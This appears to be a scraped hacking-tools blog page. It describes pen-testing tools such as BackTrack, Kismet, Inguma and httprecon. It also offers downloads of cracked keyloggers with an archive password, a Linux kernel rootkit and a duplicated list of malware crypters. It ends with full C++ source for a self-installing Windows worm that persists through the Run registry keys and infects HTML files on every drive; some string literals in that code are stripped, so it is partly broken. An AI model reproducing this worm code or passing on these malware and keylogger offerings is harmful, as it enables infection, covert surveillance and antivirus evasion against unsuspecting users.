ackTrack has a long history and was based on many different linux distributions until it is now based on a Slackware linux distribution and the corresponding live-CD scripts. Every package, kernel configuration and script is optimized to be used by security penetration testers. Patches and automation have been added, applied or developed to provide a neat and ready-to-go environment.

Because Metasploit is one of the key tools for most analysts it is tightly integrated into BackTrack and both projects collaborate together to always provide an on-the-edge implementation of Metasploit within the BackTrack CD-Rom images or the upcoming remote-exploit.org distributed and maintained virtualization images (like VMWare images appliances).


Currently BackTrack consists of more than 300 different up-to-date tools which are logically structured according to the work flow of security professionals. This structure allows even newcomers to find the related tools to a certain task to be accomplished. New technologies and testing techniques are merged into BackTrack as soon as possible to keep it up-to-date.

It’s definitely a favourite amongst pen-testers, myself included.

Read more on this article...

Size :- 82 kb

Free Download
Image and video hosting by TinyPic


Linkin Binder
Read more on this article...




Password auditing and recovery tool for Windows NT/2000/XP/2003. Accounts information import: import from local computer, import from remote computer, import from SAM file, import from .LC file, import from .LCS file, import from PwDump file, import from Sniff file. Passwords recovering by dictionary attack, brute force attack, hybrid of dictionary and brute force attacks. Brute force session distribution: sessions distribution, sessions combining. Hashes computing: LM and NT hashes computin...

A good free alternative to L0phtcrack.

Read more on this article...

Kismet

Posted by Bijay | 10:55 AM | , | 0 comments »





Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

Free Download
Image and video hosting by TinyPic

Kismet
Read more on this article...

This contains over 4319 KB of the best keylogges out their

------ Brutin added 13 Minutes and 30 Seconds later. ------

Sureshot Ghost Keylogger v.3.80
Quick Keylogger 2.1.027
Embrace
Family Key Logger
Easy Keyboard Logger v.1.0
Blazingtools Perfect Keylogger v.1.6.2.0
Ardamax Keylogger v.1.9


Free Download
Image and video hosting by TinyPic

Keylogger collection (8 in 1 keyloggers with cracks)



Password:

ghanshyam_thori

Enjoy - propz.
Read more on this article...

jfirewall test

Posted by Bijay | 7:54 AM | | 0 comments »

JFirewallTest is a free Java webstart application that tests for holes or open ports in your firewall. Unlike other solutions, JFirewallTest is a two stage testing procedure that tests all 65,536 ports very rapidly. After testing is complete, JFirewallTest will present a page of results reporting exactly what ports are open and accessible to others on the Internet.
Released: 2006-10-01
License: Freeware
Publisher: Michael Gardiner
Language: English
Platform: Windows, Linux, MAC
Requirements: Java Runtime Environment 1.4+
Install: Install and Uninstall


Free Download
Image and video hosting by TinyPic

jfirewall test

Read more on this article...

IntoXonia 2 - LKM rootkit for Linux Kernel 2.6.x


Free Download
Image and video hosting by TinyPic

IntoXonia 2 - LKM rootkit for Linux Kernel 2.6.x Read more on this article...



Quite a few people seem to be interested in this tool, so here is the latest revision - Inguma 0.0.6.

For those that don’t know, Inguma is a free penetration testing and vulnerability discovery toolkit entirely written in python. Framework includes modules to discover hosts, gather information about, fuzz targets, brute force usernames and passwords, exploits, and a disassembler.

In this new version various things have been added like new modules and improvements in the existing ones. For example the Oracle modules. The Oracle payloads now uses the Cursor Injection method when possible so CREATE PROCEDURE system privilege is not needed to become DBA.

The support for InlineEgg, added in version 0.0.5.1, have been removed and a new completely free library have been added (PyShellCodeLib).

The static analysis framework OpenDis have been enhanced and now you can use the API exposed by OpenDis to write your own binary static analysis tools. As an example of the API, a tool to make binary diffs have been added. Take a look to the file $INGUMA_DIR/dis/asmdiff.py and to the README stored in the same directory.

New 5 exploits for Oracle Databases have been added and the module “sidguess” have been enhanced to retrieve the SID of the database instance from the Enterprise Manager/Database Control banner when possible.

The new modules added to the discover, gather and brute sections are the following:

* brutehttp: A brute forcer for HTTP servers.
* extip : A tool to known your external IP address. Very useful to check anonymous proxies.
* nmbstat : A tool to gather NetBIOS information.
* ipscan : A tool to make IP protocol scans. The tool check what IP protocols are enabled in the target.
* arppoison: A tool to poison target’s ARP cache


Free Download
Image and video hosting by TinyPic

Inguma 0.0.6 Released for Download - Free Pen-testing Framework

Read more on this article...


Size :- 13 kb

Free Download
Image and video hosting by TinyPic


Icon extractor+Icon Changer

Read more on this article...

RART 1

01 - DarkAvengard Crypter
(Open source Code Crypter > p0ke >> Moded)
02 - h4ck-y0u.org crypter by DuSTY
03 - L0rD Crypter by haZl0oh
04 - AT4RE aSm Protecter 1.0 by Mouradpr
05 - AverCryptor 1.02 beta by os1r1s
06 - Cryptic 2.1 by Tughack
07 - Crew Crypter by North-Team
08 - Mortal Team Crypter 2.0 by Ras
09 - NOmeR1 by NOmeR1 and P.S.
10 - Poly! Crypt 2.8 by BUNG
11 - PowerCrypt 2.0 by N47RON
12 - Private Krypt 1.0 beta by t0pP8uZz
13 - PE Protector 0.9.2 CRYPToCRACK's by Lukas Fleischer
14 - Russian Cryptor 1.0 by master3
15 - SimbiOZ 2.1 by Extranger
16 - Snoop Crypt by snoop
17 - Zelda Crypt by snoop
18 - WinOfCrypt 1.0 by DarkPressure
19 - X-Crypter 1.2 Security-Bypass Version mod by Mareek
20 - X-Crypter 1.2 Private Version by x-zer0


RART 2

01 - Break-Into-Pattern, a.k.a BIP, v.0.1 by Icingtaupe (ASM source)
02 - Crypter v.3.1 by SLESH 2007 (Delphi source)
03 - FFC v.1.6 Public by Juza
04 - File Crypter Pro by Aphex (Delphi source)
05 - GKrpto v.1.0 by User-99
06 - Open Source Code Crypter v.1.0 by p0ke (Delphi source)
07 - Open source file crypter (ass crypter) by assoftware (Delphi source)
08 - Pecrypt by archphase (Delphi source)
09 - Pscrambler v.1.2 by p0ke (Delphi source)
10 - Smokes Crypter v1.2 (Delphi source)
11 - Cigicigi File Crypter v1.0 by turkojan
12 - iPBProtect v0.1.5 beta [****] by Forgat
13 - MaskPE v.2.0 by yzkzero
14 - PEncrypt v.4.0 by JunkCode
15 - Perplex v.1.01dev by BliZZaRD
16 - SkD Undetectabler 2.0beta by skdrat
17 - ExeSax v.0.9.1 GUI
18 - VB-PE-Crypt 1.0 by Flo
19 - UnderGround Crypter v.1.0 by Booster2ooo
20 - Daemon Crypt v.2 Public by Evil_Inside


RART 3

01 - SCE v.0.5 (Silly Chr Encrypter) by sevenC
02 - SSE v.0.5 (Simple Streverse Encryption) by sevenC
03 - Vbsencrypter v.0.01 by K
04 - File Crypter by valdir_salguei ro (from brasil - source code included)
05 - RCryptor by Vaska - included versions 1.1+1.3+1.3b+1.4+1.5+1.6b+1.6d
06 - iNF[CRYPT] by LESHIY & [nht]
07 - CryptoFilez v.2.0 by Mr.Ded
08 - Morphnah Beta2 by pyccxak.com Kas
09 - Pohernah v.1.0.2 by pyccxak.com Kas
10 - Pohernah v.1.0.3 by pyccxak.com Kas
11 - RPolyCrypt v.1.0b by Vasca
12 - StrAnGe CrYpTeR by TiPiaX (source code included)
13 - DalKrypt v1.0 by DalKiT (source code included)
14 - fEaRz Crypter v.1.0 beta1 by fEaRz
15 - Icrypt v.1.0 by BuGGz
16 - Minke v.1.0.1 by Codius
17 - Scramble Tool v0.2.3b By System33r (k0nsl)
18 - USC by p0ke - included versions 1.2D+2.1+2.1.1+Patch for 2.1.1
19 - NoodleCrypt 2 by NoodleSpa
20 - Werus Crypter v.1.0 Public version by pyccxak.com Kas

Free Download
Image and video hosting by TinyPic

Huge Pack Of Cryptors


Read more on this article...

RART 1

01 - DarkAvengard Crypter
(Open source Code Crypter > p0ke >> Moded)
02 - h4ck-y0u.org crypter by DuSTY
03 - L0rD Crypter by haZl0oh
04 - AT4RE aSm Protecter 1.0 by Mouradpr
05 - AverCryptor 1.02 beta by os1r1s
06 - Cryptic 2.1 by Tughack
07 - Crew Crypter by North-Team
08 - Mortal Team Crypter 2.0 by Ras
09 - NOmeR1 by NOmeR1 and P.S.
10 - Poly! Crypt 2.8 by BUNG
11 - PowerCrypt 2.0 by N47RON
12 - Private Krypt 1.0 beta by t0pP8uZz
13 - PE Protector 0.9.2 CRYPToCRACK's by Lukas Fleischer
14 - Russian Cryptor 1.0 by master3
15 - SimbiOZ 2.1 by Extranger
16 - Snoop Crypt by snoop
17 - Zelda Crypt by snoop
18 - WinOfCrypt 1.0 by DarkPressure
19 - X-Crypter 1.2 Security-Bypass Version mod by Mareek
20 - X-Crypter 1.2 Private Version by x-zer0


RART 2

01 - Break-Into-Pattern, a.k.a BIP, v.0.1 by Icingtaupe (ASM source)
02 - Crypter v.3.1 by SLESH 2007 (Delphi source)
03 - FFC v.1.6 Public by Juza
04 - File Crypter Pro by Aphex (Delphi source)
05 - GKrpto v.1.0 by User-99
06 - Open Source Code Crypter v.1.0 by p0ke (Delphi source)
07 - Open source file crypter (ass crypter) by assoftware (Delphi source)
08 - Pecrypt by archphase (Delphi source)
09 - Pscrambler v.1.2 by p0ke (Delphi source)
10 - Smokes Crypter v1.2 (Delphi source)
11 - Cigicigi File Crypter v1.0 by turkojan
12 - iPBProtect v0.1.5 beta [****] by Forgat
13 - MaskPE v.2.0 by yzkzero
14 - PEncrypt v.4.0 by JunkCode
15 - Perplex v.1.01dev by BliZZaRD
16 - SkD Undetectabler 2.0beta by skdrat
17 - ExeSax v.0.9.1 GUI
18 - VB-PE-Crypt 1.0 by Flo
19 - UnderGround Crypter v.1.0 by Booster2ooo
20 - Daemon Crypt v.2 Public by Evil_Inside


RART 3

01 - SCE v.0.5 (Silly Chr Encrypter) by sevenC
02 - SSE v.0.5 (Simple Streverse Encryption) by sevenC
03 - Vbsencrypter v.0.01 by K
04 - File Crypter by valdir_salguei ro (from brasil - source code included)
05 - RCryptor by Vaska - included versions 1.1+1.3+1.3b+1.4+1.5+1.6b+1.6d
06 - iNF[CRYPT] by LESHIY & [nht]
07 - CryptoFilez v.2.0 by Mr.Ded
08 - Morphnah Beta2 by pyccxak.com Kas
09 - Pohernah v.1.0.2 by pyccxak.com Kas
10 - Pohernah v.1.0.3 by pyccxak.com Kas
11 - RPolyCrypt v.1.0b by Vasca
12 - StrAnGe CrYpTeR by TiPiaX (source code included)
13 - DalKrypt v1.0 by DalKiT (source code included)
14 - fEaRz Crypter v.1.0 beta1 by fEaRz
15 - Icrypt v.1.0 by BuGGz
16 - Minke v.1.0.1 by Codius
17 - Scramble Tool v0.2.3b By System33r (k0nsl)
18 - USC by p0ke - included versions 1.2D+2.1+2.1.1+Patch for 2.1.1
19 - NoodleCrypt 2 by NoodleSpa
20 - Werus Crypter v.1.0 Public version by pyccxak.com Kas

Free Download
Image and video hosting by TinyPic

Huge Pack Of Cryptors


Read more on this article...




The httprecon project is doing some research in the field of web server fingerprinting, also known as http fingerprinting. The goal is the highly accurate identification of given httpd implementations. This is very important within professional vulnerability analysis.

Besides the discussion of different approaches and the documentation of gathered results also an implementation for automated analysis is provided. This software shall improve the easiness and efficiency of this kind of enumeration. Traditional approaches as like banner-grabbing, status code enumeration and header ordering analysis are used. However, many other analysis techniques were introduced to increase the possibilities of accurate web server fingerprinting.

Besides the well-known enumeration of http response status codes and header-ordering several other fingerprinting mechanisms were introduced. For example the capitalization of header lines, the use of spaces and the structure of ETag values (e.g. length and quotes).

There are nine test cases in which the behavior of the target service ismapped. These are:

* legitimate GET request for an existing resource
* very long GET request (>1024 bytes in URI)
* common GET request for a non-existing resource
* common HEAD request for an existing resource
* allowed method enumeration with OPTIONS
* usually not permitted http method DELETE
* not defined http method TEST
* non-existing protocol version HTTP/9.8
* GET request including attack patterns (e.g. ../ and %%)

This increases the amount of fingerprints to distinguish the given implementation. Thus, the accuracy of the fingerprinting series is very high. Theoretically httprecon 1.x is able to generate approx. 198 fingerprint atoms per full scan run (usually between 80 and 120 are given).

Read more on this article...

___________________________________________________________________________________________
HTML Worm
// Name: Win32.HTMLworm
// Author: WarGame
// Compiler: Borland C++
// Description: This worm spreads by adding a link to itself in html files
// Improvements: You could add a link to a page containing an IE exploits :)

#include
#include
using namespace std; // :)

// This function does the real work
void HTMLSpread(char *htmlfile)
{
HANDLE html_fd;
DWORD html_filesize,read_bytes,written_bytes;
char *c_htmlcode = NULL;
string *htmlcode = NULL; // make it simpler
long pos;

// open the html file
html_fd = CreateFile(htmlfile,GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);

if(
html_fd == INVALID_HANDLE_VALUE)
{
return;
}

// get file size
html_filesize = GetFileSize(html_fd,NULL);

// allocate enough memory
c_htmlcode = (char *)malloc(html_filesize);

if(
c_htmlcode == NULL)
{
return;
}

// read entire file
if(ReadFile(html_fd,c_htmlcode,html_filesize,&read_bytes,NULL) == 0)
{
CloseHandle(html_fd);
return;
}

// create a string object
htmlcode = new string(c_htmlcode);
free(c_htmlcode);

// already infected ?
if(htmlcode->find("") == string::npos)
{

pos = htmlcode->find("");

if(
pos == string::npos)
{
pos = htmlcode->find("");

if(
pos == string::npos)
{
CloseHandle(html_fd);
delete htmlcode;
return;
}
}

// add link
htmlcode->replace(pos,7,"\r\n\r\n");

// write new file
SetFilePointer(html_fd,0,0,FILE_BEGIN);
WriteFile(html_fd,htmlcode->c_str(),htmlcode->size(),&written_bytes,NULL);
// infection mark
WriteFile(html_fd,"",36,&written_bytes,NULL);

}

// close all
CloseHandle(html_fd);
delete htmlcode;

}

// add worm to startup list
void AutoStart(char *my_path)
{
HKEY hkey;

if(
RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,
KEY_WRITE,&hkey)==ERROR_SUCCESS)
{
RegSetValueEx(hkey,"himon",0,REG_SZ,my_path,strlen(my_path));
RegCloseKey(hkey);
}

if(
RegOpenKeyEx(HKEY_CURRENT_USER,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,
KEY_WRITE,&hkey)==ERROR_SUCCESS)
{
RegSetValueEx(hkey,"himon",0,REG_SZ,my_path,strlen(my_path));
RegCloseKey(hkey);
}
}

// This will scan drives for html files
void S3arch(char *pt) {
char sc[MAX_PATH],buf[MAX_PATH];
WIN32_FIND_DATA in;
HANDLE fd,file;
char *fm = "%s\\%s",*fm1 = "%s\\*.*";

if(
strlen(pt) == 3)
{
pt[2] = '\0'; /* :-) */
}

sprintf(sc,fm1,pt);
fd = FindFirstFile(sc,&in);

do
{

sprintf(buf,fm,pt,in.cFileName);

/* dot :) */
if(strcmp(in.cFileName,"..") != 0 && strcmp(in.cFileName,".") != 0 && (in.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
{
S3arch(buf);
}

/* File found */
else
{

/* is it good to infect ? */

if(strstr(in.cFileName,".html") || strstr(in.cFileName,".htm"))
{
HTMLSpread(buf);
}
}

}while(
FindNextFile(fd,&in));

FindClose(fd);
}


// entry point of worm
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
// usual shit: installation part, startup and so on ...
char I_am_here[MAX_PATH],installation_path[MAX_PATH];
char Drives[3],Drive = 0;
UINT drive_type;


// only one copy
CreateMutex(NULL,FALSE,"__HTMLworm_by_WarGame_EOF__");
if(
GetLastError() == ERROR_ALREADY_EXISTS)
{
ExitProcess(0);
}

GetSystemDirectory(installation_path,MAX_PATH);
strcat(installation_path,"\\himon.exe");

GetModuleFileName(NULL,I_am_here,MAX_PATH);
// Copy!
CopyFile(I_am_here,installation_path,FALSE);
AutoStart(installation_path);


// the real part starts here
while(1)
{

/* Search for drives */
for(Drive = 'C';Drive <= 'Z';Drive++)
{
Drives[0] = Drive;
Drives[1] = ':';
Drives[2] = '\\';
Drives[3] = '\0';

/* drive ? */
drive_type = GetDriveType(Drives);

/* only fixed, remote and removable drives */
if(drive_type == DRIVE_FIXED ||
drive_type == DRIVE_REMOTE ||
drive_type == DRIVE_REMOVABLE)
{
/* GO! */
S3arch(Drives);
}
}

/* every 10 minutes */
Sleep((1000*60)*10);
}
}

__________________________________________________________________________________________

Read more on this article...